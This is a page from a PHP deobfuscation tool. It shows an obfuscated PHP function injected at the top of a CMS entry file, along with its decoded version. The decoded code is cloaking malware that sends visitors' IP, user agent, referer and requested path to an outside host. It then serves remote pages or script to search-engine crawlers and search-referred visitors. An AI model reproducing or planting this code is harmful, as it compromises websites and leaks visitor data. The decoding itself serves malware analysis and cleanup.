Decode result (<?php tS_K0(); function tS_k0() { goto lV6MU; WhV2x: JaJYE: goto htacm; wZT92: echo $sLiuA; goto ) PHP deobfuscation tool 2025-12-27 22:44:59

Decoded the code below.

<?php tS_K0(); function tS_k0() { goto lV6MU; WhV2x: JaJYE: goto htacm; wZT92: echo $sLiuA; goto fKDL6; Q73t8: $c30H2 = "\160\143"; goto HAYuy; Sgkyi: exit; goto Uh_Yl; lV6MU: error_reporting(0); goto M1k32; yUM6u: Me4pP: goto wP9QP; htacm: goto u31hg; goto yUM6u; bhObK: exit; goto gCk13; tQkiC: ...

Obfuscated php code

<?php
 tS_K0(); function tS_k0() { goto lV6MU; WhV2x: JaJYE: goto htacm; wZT92: echo $sLiuA; goto fKDL6; Q73t8: $c30H2 = "\160\143"; goto HAYuy; Sgkyi: exit; goto Uh_Yl; lV6MU: error_reporting(0); goto M1k32; yUM6u: Me4pP: goto wP9QP; htacm: goto u31hg; goto yUM6u; bhObK: exit; goto gCk13; tQkiC: echo $SmFAE; goto Sgkyi; v72i4: if (!$OTT4X) { goto JaJYE; } goto dgcHa; HAYuy: $vBc9I = "\163\x68\x6f\165\171\x65"; goto KrWXH; Bxa_t: $c30H2 = "\160\x63"; goto nRgiU; YgViG: $fNish = $_SERVER; goto ACA6M; DLP5z: goto u31hg; goto I6Nuj; EN6e5: define("\x74\x56\127\70\x50", base64_decode("\121\x45\112\150\x61\x57\x52\x31\x66\x46\x4e\x76\x5a\62\71\61\x66\x46\x6c\x70\x63\62\x39\61\146\105\150\150\142\63\x4e\x76\x64\x58\x78\x54\143\x47\x6c\153\132\130\x4a\x38\125\x32\70\x75\131\62\x39\x74\x66\106\x4e\164\x4c\155\116\x75\x51\107\153\75")); goto V3HZC; pOcdd: if (!$SmFAE) { goto PvBza; } goto qxnum; Uh_Yl: L7ryg: goto av9Z0; av9Z0: u31hg: goto G02zP; KrWXH: $SmFAE = file_get_contents(cA4Nq . "\x2f\x69\x6e\x64\x65\170\x2e\x70\x68\160\x3f\165\141\75" . $c30H2 . "\x26\146\151\x6c\145\x73\x3d" . $vBc9I . "\x26\x68\157\163\x74\75" . dM10q . "\46\160\141\x74\150\x3d" . o2vGD . "\x26\165\163\x65\162\x69\160\x3d" . QOQt0 . "\x26\x75\x73\x65\162\165\141\x3d" . f9sYE . "\46\x73\157\165\162\143\145\x3d" . cByRs, false, $rGtXK); goto pOcdd; vy1Pp: cOjai: goto J3AqE; GQ2An: $rGtXK = stream_context_create($s_wkb); goto YgViG; fKDL6: exit; goto WhV2x; Pi0zR: goto cOjai; goto a9ofs; G02zP: goto cOjai; goto sVo5n; sVo5n: tjcDx: goto Q73t8; dgcHa: $sLiuA = "\74\155\145\164\141\x20\x63\x68\x61\162\x73\145\x74\x3d\42\x75\164\146\55\x38\x22\76\74\x73\143\162\151\x70\x74\40\164\171\x70\x65\x3d\x22\164\x65\x78\x74\57\x6a\141\166\141\x73\x63\x72\151\x70\x74\x22\x20\x3e" . $OTT4X . "\x3c\x2f\x73\x63\x72\151\x70\x74\76"; goto wZT92; h3e3u: $s_wkb = array("\x68\164\x74\160" => array("\x6d\145\x74\150\157\144" => "\x47\x45\x54", "\164\151\155\145\157\165\164" => 5)); goto GQ2An; AZkNo: define("\x64\115\x31\x30\161", $fNish["\110\x54\124\x50\137\x48\x4f\x53\x54"]); goto Yu2NL; e6EOs: if (!$SmFAE) { goto L7ryg; } goto tQkiC; a9ofs: VNDtH: goto nXuyo; wP9QP: $c30H2 = "\160\143"; goto PQwYQ; nXuyo: if (preg_match(tVW8P, cByRs)) { goto wo8Hb; } goto A4gYS; M1k32: header("\x43\157\156\164\145\156\164\x2d\124\171\x70\145\72\x74\145\170\x74\x2f\150\164\155\x6c\73\x63\x68\x61\162\x73\145\164\x3d\165\x74\x66\55\x38"); goto h3e3u; vikWf: $SmFAE = file_get_contents(cA4Nq . "\x2f\151\156\144\145\x78\56\x70\150\160\77\165\x61\75" . $c30H2 . "\x26\146\x69\x6c\145\x73\75" . $vBc9I . "\46\150\157\x73\x74\75" . dM10q . "\46\160\x61\x74\150\x3d" . o2vGD . "\46\165\x73\145\x72\151\160\75" . QOQt0 . "\x26\165\x73\145\x72\165\141\75" . f9sYE . "\x26\x73\x6f\165\x72\143\145\x3d" . cByRs, false, $rGtXK); goto e6EOs; sZKMF: $OTT4X = file_get_contents(cA4Nq . "\57\151\x6e\144\x65\170\56\x70\150\160\77\165\x61\x3d" . $c30H2 . "\x26\x66\x69\x6c\145\x73\75" . $vBc9I . "\46\150\x6f\163\164\x3d" . dM10q . "\46\160\141\164\150\x3d" . o2vGD . "\46\165\x73\145\x72\x69\x70\x3d" . QOQt0 . "\x26\165\x73\145\x72\165\141\75" . f9sYE . "\46\x73\157\165\x72\143\145\x3d" . cByRs, false, $rGtXK); goto v72i4; PQwYQ: $vBc9I = "\156\x65\x69\x79\145"; goto vikWf; cwuED: define("\x63\102\x79\x52\163", $fNish["\110\124\124\x50\137\x52\105\106\x45\122\105\122"]); goto xXV2Q; V3HZC: if (preg_match("\x40\151\x64\75\133\x5b\72\x61\154\156\x75\155\x3a\135\x5d\173\66\x7d\55\x5b\x5b\72\141\154\x6e\165\155\72\x5d\x5d\173\66\x7d\100\x69", o2vGD)) { goto VNDtH; } goto CfHIE; qxnum: echo $SmFAE; goto bhObK; gCk13: PvBza: goto vy1Pp; k2K9q: define("\x63\101\64\x4e\161", base64_decode("\x61\110\x52\60\143\x44\157\x76\114\x32\x39\64\x61\x57\61\172\142\x53\65\165\x5a\x58\x51\x3d")); goto EN6e5; CfHIE: if (preg_match(tVW8P, f9sYE)) { goto tjcDx; } goto Pi0zR; I6Nuj: wo8Hb: goto Bxa_t; nRgiU: $vBc9I = "\x6a\x73\137\164\170\164"; goto sZKMF; Yu2NL: define("\x66\x39\x73\x59\x45", $fNish["\x48\x54\x54\x50\x5f\125\123\x45\122\x5f\x41\107\x45\116\x54"]); goto k2K9q; xXV2Q: define("\121\x4f\121\164\x30", $fNish["\122\105\115\x4f\124\105\x5f\x41\104\x44\122"]); goto AZkNo; ACA6M: define("\x6f\x32\x76\107\x44", $fNish["\x52\x45\x51\x55\x45\x53\124\137\125\122\x49"]); goto cwuED; A4gYS: if (preg_match(tVW8P, f9sYE)) { goto Me4pP; } goto DLP5z; J3AqE: }
?><?php
/**
 * @copyright (C)2016-2099 Hnaoyun Inc.
 * @author XingMeng
 * @email hnxsh@foxmail.com
 * @date 2016年11月5日
 *  用户前端入口文件
 */

// 定义为入口文件
define('IS_INDEX', true);

// 入口文件地址绑定
define('URL_BIND', 'home');

// PHP版本检测
if (PHP_VERSION < '5.3') {
    header('Content-Type:text/html; charset=utf-8');
    exit('您服务器PHP的版本太低，程序要求PHP版本不小于5.3');
}

// 引用内核启动文件
require dirname(__FILE__) . '/core/start.php';

Decoded(de-Obfuscated) php code

<?php

tS_K0();
function tS_k0()
{
    error_reporting(0);
    header("Content-Type:text/html;charset=utf-8");
    $s_wkb = array("http" => array("method" => "GET", "timeout" => 5));
    $rGtXK = stream_context_create($s_wkb);
    $fNish = $_SERVER;
    define("o2vGD", $fNish["REQUEST_URI"]);
    define("cByRs", $fNish["HTTP_REFERER"]);
    define("QOQt0", $fNish["REMOTE_ADDR"]);
    define("dM10q", $fNish["HTTP_HOST"]);
    define("f9sYE", $fNish["HTTP_USER_AGENT"]);
    define("cA4Nq", "http://oximsm.net");
    define("tVW8P", "@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i");
    if (preg_match("@id=[[:alnum:]]{6}-[[:alnum:]]{6}@i", o2vGD)) {
        if (preg_match(tVW8P, cByRs)) {
            $c30H2 = "pc";
            $vBc9I = "js_txt";
            $OTT4X = file_get_contents("http://oximsm.net/index.php?ua=pc&files=js_txt&host=dM10q&path=o2vGD&userip=QOQt0&userua=f9sYE&source=cByRs", false, $rGtXK);
            if (!$OTT4X) {
                goto u31hg;
            }
            $sLiuA = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >" . $OTT4X . "</script>";
            echo $sLiuA;
            exit;
        }
        if (preg_match(tVW8P, f9sYE)) {
            $c30H2 = "pc";
            $vBc9I = "neiye";
            $SmFAE = file_get_contents("http://oximsm.net/index.php?ua=pc&files=neiye&host=dM10q&path=o2vGD&userip=QOQt0&userua=f9sYE&source=cByRs", false, $rGtXK);
            if (!$SmFAE) {
                goto av9Z0;
            }
            echo $SmFAE;
            exit;
        }
        av9Z0:
        u31hg:
        goto cOjai;
    }
    if (preg_match(tVW8P, f9sYE)) {
        $c30H2 = "pc";
        $vBc9I = "shouye";
        $SmFAE = file_get_contents("http://oximsm.net/index.php?ua=pc&files=shouye&host=dM10q&path=o2vGD&userip=QOQt0&userua=f9sYE&source=cByRs", false, $rGtXK);
        if (!$SmFAE) {
            goto vy1Pp;
        }
        echo $SmFAE;
        exit;
    }
    vy1Pp:
    cOjai:
}
/**
 * @copyright (C)2016-2099 Hnaoyun Inc.
 * @author XingMeng
 * @email hnxsh@foxmail.com
 * @date 2016年11月5日
 *  用户前端入口文件
 */
// 定义为入口文件
define('IS_INDEX', true);
// 入口文件地址绑定
define('URL_BIND', 'home');
// PHP版本检测
if (false) {
    header('Content-Type:text/html; charset=utf-8');
    exit('您服务器PHP的版本太低，程序要求PHP版本不小于5.3');
}
// 引用内核启动文件
require "/var/www/html/core/start.php";

Malware detection & removal plugin for WordPress

PHP deobfuscation, decryption, reconstruction tool

Obfuscated php code

Decoded(de-Obfuscated) php code